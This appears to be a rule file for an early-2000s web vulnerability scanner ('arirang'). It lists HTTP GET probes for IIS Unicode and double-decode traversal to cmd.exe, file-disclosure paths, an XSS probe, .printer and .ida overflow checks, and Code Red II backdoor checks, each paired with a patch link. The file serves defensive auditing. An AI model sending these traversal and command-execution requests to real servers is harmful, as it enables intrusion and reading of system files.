200 OK-> GET :/cgi/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 10;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/exchange/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 11;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/adsamples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 12;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
200 OK-> GET :/_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 13;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873;
#end IIS File Parsing Vulnerability  Remote Execute Check
200 OK-> GET :/scripts/cpshost.dll^Site Server 2 File Upload(cpshost.dll);http://www.microsoft.com/siteserver/;
200 OK-> GET :/scripts/uploadn.asp^Site Server 2 File Upload(uploadn.asp);http://www.microsoft.com/siteserver/;
200 OK-> GET :/scripts/uploadx.asp^Site Server 2 File Upload(uploadx.asp);http://www.microsoft.com/siteserver/;
200 OK-> GET :/scripts/upload.asp^Site Server 2 File Upload(upload.asp);http://www.microsoft.com/siteserver/;
200 OK-> GET :/scripts/repost.asp^Site Server 2 File Upload(repost.asp);http://www.microsoft.com/siteserver/;
200 OK-> GET :/scripts/postinfo.asp^Site Server 2 File Upload(postinfo.asp);http://www.microsoft.com/siteserver/;
200 OK-> GET :/default.asp^IIS some information(default.asp);delete default.asp;
200 OK-> GET :/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<SCRIPT>alert(document.domain)</SCRIPT>"^Indexing service for win2k .htw;solution:http://www.microsoft.com/technet/security/bulletin/ms00-084.asp;
200 OK-> GET :/cgi-bin/c32web.exe/ShowAdminDir^Cart32 multiple(c32web.exe)     check A ;solution:http://www.cart32.com/update;
200 OK-> GET :/cgi-bin/c32web.exe/CheckError?error=53^Cart32 multiple(c32web.exe)     check B ;solution:http://www.cart32.com/update;
200 OK-> GET :/ex/jsp/simple.jsp.^Unify ServletExec JSP simple.jsp.) ;http://www.unify.com/products/ewave/servletexec.htm;
200 OK-> GET :/pbserver/^MS PhoneBook Server bof (/pbserver/);http://www.microsoft.com/technet/security/bulletin/ms00-094.asp;
200 OK-> GET :/pbserver/pbserver.dll^MS PhoneBook Server bof (pbserver.dll);http://www.microsoft.com/technet/security/bulletin/ms00-094.asp;
200 OK-> GET :/index.php3.%5c../..%5cconf/httpd.conf^Apache,PHP file disclosure(httpd.conf);http://www.apache.org;
200 OK-> GET :/../../../autoexec.bat^Keware file disclosure(autoexec.bat);http://www.keware.com;
200 OK-> GET :/.nsf/../winnt/win.ini^Lotus Domino Direcotry(win.ini);;
200 OK-> GET :/scripts/bbs.pl%3F+.htr^IIS 5 Source 3F+.htr test A ;solution:http://www.microsoft.com/technet/security/bulletin/ms01-004.asp;
200 OK-> GET :/login.asp%3F+.htr^IIS 5 Source 3F+.htr test B ;solution:http://www.microsoft.com/technet/security/bulletin/ms01-004.asp;
200 OK-> GET :/cpqlogin.htm^Compaq Web Admin bof(/cpqlogin.htm);http://www5.compaq.com/products/servers/management/agentsecurity.html; 
200 OK-> GET :/Proxy/LoginResponse^Compaq Web Admin bof(LoginResponse);http://www5.compaq.com/products/servers/management/agentsecurity.html; 
200 OK-> GET :/cgi-bin/statsconfig.pl^OmniHTTPD Execute(statsconfig.pl);delete file or http://www.omnicron.ab.ca;
200 OK-> GET :/a.jsp//..//..//..//..//..//../winnt/win.ini^Oracle Servlet (win.ini) ;solution:http://otn.oracle.com/software/tech/java/servlets/htdocs/listing.htm;
200 OK-> GET :/..\\..\\..\\..\\..\\..\autoexec.bat^GoAhead Webserver file(autoexec.bat);http://www.goahead.com/webserver/webserver.htm;
200 OK-> GET :/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\^GoAhead Webserver remote execute;http://www.goahead.com/webserver/webserver.htm;
200 OK-> GET :/cgi/^HSWeb Server Path(/cgi/);http://www.jeffheaton.com/hsweb/;
200 OK-> GET :/isapi/tstisapi.dll^Pi3Web Buffer overflow(tstisapi.dll);solution:delete file;
200 OK-> GET :/../../../scandisk.log^WEBactive file read(scandisk.log);solution:uninstall WEBactive;
200 OK-> GET :\\../readme.txt^Caucho Resin file read(readme.txt);http://www.caucho.com;
200 OK-> GET :/../../../../../../Scandisk.log^A1 Server v1.0a HTTPd (Scandisk.log);http://msnhomepages.talkcity.com/windowsway/lriver2/a1server.htm;
200 OK-> GET ::8080/.jsp/WEB-INF/classes/Env.java^Resin Javabean file disclosure vulnerability;; 
#IIS .printer mapping buffer overflow check [english]
Error in web printer-> GET :/NULL.printer HTTP/1.0\r\n\r\n^IIS 5 .printer check test;Disabling web based printing results in a registry entry.\n\tHKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1\n\tThis entry must be set to 1 for the .printer mapping to reliably be disabled.\n\t .printer have a buffer overflow-high lisk\n\tif you didn't patch,you must to patch your server\t\n\thttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321;
#korean
À¥ ÇÁ¸°ÅÍ ¼³Ä¡¿¡ ÀÖ´Â ¿À·ù-> GET :/NULL.printer HTTP/1.0\r\n\r\n^IIS 5 .printer check test;Disabling web based printing results in a registry entry.\n\tHKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1\n\tThis entry must be set to 1 for the .printer mapping to reliably be disabled.\n\t .printer have a buffer overflow-high lisk\n\tif you didn't patch,you must to patch your server\t\n\thttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321;
##########################################################################################################
#   IIS 4/5 CGI Decode bug scan rule file for tuxe, arirang  information by 
#   Aldo Albuquerque - CCSA  Tempest Security Technologies - http://www.tempest.com.br
#   CESAR - Centro de Estudos e Sistemas Avan?dos do Recife -
#   http://www.cesar.org.br
#   IIS 4/5 CGI Decoding bug found by nsfocus http://www.nsfocus.com/english/homepage/sa01-02.htm
#   CVE : http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0333 
#   vendor patch
#   IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787
#   IIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764 
#   
200 OK-> GET :/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug1;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug2;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug3;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug4;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug5;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug6;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug7;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug8;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug9;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug10;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug11;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug12;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug13;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug14;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;


#- Windows 2000 Server + SP1 + IIS5.0 - Default installation
#* The following combinations of directories/encodings work:
200 OK-> GET :/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug15;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug16;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug17;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug18;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug19;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug20;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug21;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug22;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug23;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug24;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug25;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug26;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug27;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug28;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug29;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug30;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug31;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug32;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/exchange/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug33;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug34;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
200 OK-> GET :/cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug35;IIS 4.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764;
# check secure IIS 5 http://www.microsoft.com/technet/security/iis5chk.asp 

######################################################################################################################### 
# arirang 1.6 scan rule for IIS .ida buffer overflow and check CodeRed II infected server.
# codered.uxe
# by pilot 2001/08/10
# thanks RYMUS,NORBERT (Non-HP-Germany,ex1)
#
#http://www.eeye.com/html/Research/Advisories/AD20010618.html
#http://www.microsoft.com/technet/security/bulletin/MS01-033.asp

# Korean people please visit  http://www.hauri.co.kr
#                             http://www.ahnlab.co.kr
#
# usage)
# C Class) arirang -G -s 192.168.1.1 -e 192.168.1.255 -r codered2.uxe
# B Class) arirang -G -s 192.168.0.1 -e 192.168.255.255 -r codered2.uxe
# specfic ip address example) arirang -G -s 192.168.1.10 -e 192.168.1.20 -r codered2.uxe
# one host scan) arirang -G -h 192.168.1.1 -r codered2.uxe
#
# Q)how do i check IIS server in our network?
# example C CLASS)./arirang -G -s 192.168.1.1 -e 192.168.1.255|grep IIS
ALL IDQ-> GET :/a.ida?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^server already deleted .ida , not vulnerable;;
ALL IDQ-> GET :/a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^server already deleted .idq , not vulnerable;;
ALL processing-> GET :/a.ida?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^IIS .ida buffer overflow found, Vulnerable;http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
ALL processing query-> GET :/a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa^IIS .idq buffer overflow found, Vulnerable;http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/c/inetpub/scripts/root.exe?/c+dir^Code Red II Worm Infected check1;remove root.exe,c:\explorer.exe then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/c/winnt/system32/cmd.exe?/c+dir^Code Red II Worm Infected check2; remove c:\explorer.exe ,modify cmd.exe permission only administrator then reboot server, patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/d/inetpub/scripts/root.exe?/c+dir^Code Red II Worm Infected check3;remove d:\explorer.exe,root.exe, then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/d/winnt/system32/cmd.exe?/c+dir^Code Red II Worm Infected check4; remove d:\explorer.exe ,modify cmd.exe permission only administrator then reboot server, patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/scripts/root.exe?/c+dir^Code Red II Worm Infected check5;remove /scripts/root.exe,c:\explorer.exe then reboot server,patch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;
200 OK-> GET :/msadc/root.exe?/c+dir^Code Red II Worm Infected check6;remove /msadc/root.exe,c:\explorer.exe then reboot server\npatch http://www.microsoft.com/technet/security/bulletin/MS01-033.asp;